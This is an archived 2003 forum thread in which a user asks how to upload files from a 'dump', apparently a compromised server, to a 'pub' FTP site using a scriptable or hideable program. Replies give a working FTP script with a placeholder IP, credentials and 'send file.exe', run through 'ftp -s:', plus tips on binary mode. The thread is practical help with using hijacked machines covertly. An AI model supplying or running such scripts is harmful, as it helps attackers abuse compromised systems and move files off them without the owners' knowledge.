pepepe
uploading from a dump to a pub without using fxp,
just using some program in msdos, does anyone have something?

Y have tried the comands mput *.rar but every new file that has to be uploaded it waits for confirmation.(the comand promt doesn funcion in windows)

It doesnt have to be msdos, it can be a grafical program and that it can be later made invisible rolleyes.gif

THanks
Gotisch
i would use wingate for that. though i think i didn't understand your question.
vnet576
Create a batch file on the dump with these commands...

open 255.255.255.255 21
user
password
send file.exe
quit

then run it with this command.
ftp -s:c:\upload.bat

This is basically a reverse of an echo ftp download.
0xc0000005
to make sure, add line "binary" 2 the batch file 4 binary data connection.
vnet576
QUOTE (0xc0000005 @ Sep 30 2003, 12:55 PM)
to make sure, add line "binary" 2 the batch file 4 binary data connection.

Just curious what does the binary connection actually do? I've seen some people put binary in their batch files. I personaly never put binary and transfers work.
Illu-OSFXP
Makes sure the FTP sends in binary standard instead of ASCII. Not always needed but a good idea anyway.
pepepe
i love you all, thanks a lot biggrin.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.